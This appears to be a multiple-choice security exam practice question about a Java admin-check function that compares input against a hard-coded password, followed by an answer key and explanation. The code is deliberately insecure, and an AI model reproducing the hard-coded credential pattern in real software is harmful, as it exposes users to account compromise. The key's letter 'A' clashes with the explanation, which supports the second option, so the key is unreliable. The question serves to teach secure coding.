Your company has been contracted to develop an Android mobile application for a major bank. You have been asked to verify the security of the Java function’s source code below:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

int verifyAdmin(String password) {
    if (password.equals("mR7HCS14@31&#")) { return 0; }
    return 1;
}

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Which of the following vulnerabilities exist in this application’s authentication function based solely on the source code provided?

The function is vulnerable to an SQL injection attack

The function is using hard-coded credentials to verify the password entered by the user

The function is vulnerable to a buffer overflow attack

The function is using parameterized queries

A

The function is using hard-coded credentials in the function, which is an insecure practice that can lead to compromise. The password for the application is shown in the source code as mR7HCS14@31&#. Even if this was obfuscated using encoding or encryption, it is a terrible security practice to include hard-coded credentials in the application since they can be reverse engineered by an attacker, and in this case, it could be used to rob the bank or its customers! There is no evidence of a SQL injection or buffer overflow attack vulnerability based on the code being shown. In fact, this code doesn’t even show any SQL or ability to connect to an SQL database. We cannot see the variable initialization in this code, either, so we cannot determine if it is vulnerable to a buffer overflow attack. Finally, a parameterized query is a security feature, not a vulnerability, and this source code does not show any evidence of parameterized queries being used.